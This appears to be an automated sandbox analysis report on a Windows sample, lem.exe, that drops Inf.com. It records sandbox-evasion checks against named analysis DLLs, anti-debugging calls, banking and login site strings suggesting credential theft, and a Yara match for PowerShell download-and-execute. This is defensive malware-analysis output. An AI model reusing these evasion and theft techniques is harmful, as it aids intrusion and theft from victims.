                Source: C:\Users\user\Desktop\lem.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\lem.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\lem.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\lem.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\lem.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\lem.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: cabinet.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: napinsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: wshbth.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: nlaapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: winrnr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: dbghelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\lem.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: Google Drive.lnk.17.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                Source: YouTube.lnk.17.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                Source: Sheets.lnk.17.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                Source: Gmail.lnk.17.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                Source: Slides.lnk.17.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                Source: Docs.lnk.17.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: lem.exeStatic file information: File size 1273852 > 1048576
                Source: lem.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: cryptosetup.pdbGCTL source: Inf.com, 0000000D.00000002.3274650017.00000000015AA000.00000004.00000020.00020000.00000000.sdmp, 68QI5X.13.dr
                Source: Binary string: cryptosetup.pdb source: Inf.com, 0000000D.00000002.3274650017.00000000015AA000.00000004.00000020.00020000.00000000.sdmp, 68QI5X.13.dr
                Source: C:\Users\user\Desktop\lem.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
                Source: lem.exeStatic PE information: real checksum: 0x13b848 should be: 0x144e84
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A30DE6 push ecx; ret 13_2_00A30DF9

                Persistence and Installation Behavior

                barindex
                Drops PE files with a suspicious file extension
                Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comJump to dropped file
                Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comJump to dropped file
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile created: C:\ProgramData\9HDT0HDBIMOZ\68QI5XJump to dropped file
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile created: C:\ProgramData\9HDT0HDBIMOZ\68QI5XJump to dropped file
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile created: C:\ProgramData\9HDT0HDBIMOZ\68QI5XJump to dropped file

                Boot Survival

                barindex
                Monitors registry run keys for changes
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunJump to behavior
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00AA26DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,13_2_00AA26DD
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A2FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,13_2_00A2FC7C
                Source: C:\Users\user\Desktop\lem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\lem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\lem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\lem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\lem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\lem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\lem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\lem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\lem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\lem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\lem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\lem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Found API chain indicative of sandbox detection
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_13-105262
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: Inf.com, 0000000D.00000002.3276645001.0000000004460000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %HSWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION
                Source: Inf.com, 0000000D.00000002.3276645001.0000000004460000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: DIR_WATCH.DLLAP
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comDropped PE file which has not been started: C:\ProgramData\9HDT0HDBIMOZ\68QI5XJump to dropped file
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comAPI coverage: 3.7 %
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\lem.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
                Source: C:\Users\user\Desktop\lem.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A7DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,13_2_00A7DC54
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A8A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,13_2_00A8A087
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A8A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,13_2_00A8A1E2
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A7E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,13_2_00A7E472
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A8A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,13_2_00A8A570
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A866DC FindFirstFileW,FindNextFileW,FindClose,13_2_00A866DC
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A4C622 FindFirstFileExW,13_2_00A4C622
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A873D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,13_2_00A873D4
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A87333 FindFirstFileW,FindClose,13_2_00A87333
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A7D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,13_2_00A7D921
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A15FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,13_2_00A15FC8
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Jump to behavior
                Source: chrome.exe, 00000011.00000002.2693095928.000051D800080000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                Source: D2DTJM.13.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: chrome.exe, 00000011.00000002.2683469881.00000161C7865000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: D2DTJM.13.drBinary or memory string: discord.comVMware20,11696428655f
                Source: D2DTJM.13.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: D2DTJM.13.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: D2DTJM.13.drBinary or memory string: global block list test formVMware20,11696428655
                Source: D2DTJM.13.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: Inf.com, 0000000D.00000002.3274095484.00000000014E6000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 0000000D.00000002.3277051984.00000000044FD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: msedge.exe, 00000015.00000003.2749568805.000054E00039C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware20,1(
                Source: D2DTJM.13.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: D2DTJM.13.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: D2DTJM.13.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: D2DTJM.13.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: D2DTJM.13.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: D2DTJM.13.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: D2DTJM.13.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: D2DTJM.13.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: D2DTJM.13.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: chrome.exe, 00000011.00000002.2682443030.00000161C3CA8000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000015.00000002.2760397293.000002708D643000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000019.00000002.2927420587.0000022CE5642000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: D2DTJM.13.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: D2DTJM.13.drBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: D2DTJM.13.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: D2DTJM.13.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: chrome.exe, 00000011.00000002.2683469881.00000161C7865000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_
                Source: D2DTJM.13.drBinary or memory string: AMC password management pageVMware20,11696428655
                Source: D2DTJM.13.drBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: chrome.exe, 00000011.00000002.2695703721.000051D8007D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=adebf139-8470-4e39-9765-e2a30b13ddca
                Source: D2DTJM.13.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: D2DTJM.13.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: D2DTJM.13.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: chrome.exe, 00000011.00000002.2699271875.000051D801198000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware Virtual USB Mouse)
                Source: D2DTJM.13.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: D2DTJM.13.drBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: D2DTJM.13.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: D2DTJM.13.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: D2DTJM.13.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: D2DTJM.13.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: Inf.com, 0000000D.00000002.3277051984.00000000044FD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWC&
                Source: D2DTJM.13.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A8F4FF BlockInput,13_2_00A8F4FF
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A1338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,13_2_00A1338B
                Source: C:\Users\user\Desktop\lem.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A35058 mov eax, dword ptr fs:[00000030h]13_2_00A35058
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A720AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,13_2_00A720AA
                Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A42992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00A42992
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A30BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00A30BAF
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A30D45 SetUnhandledExceptionFilter,13_2_00A30D45
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A30F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_00A30F91

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
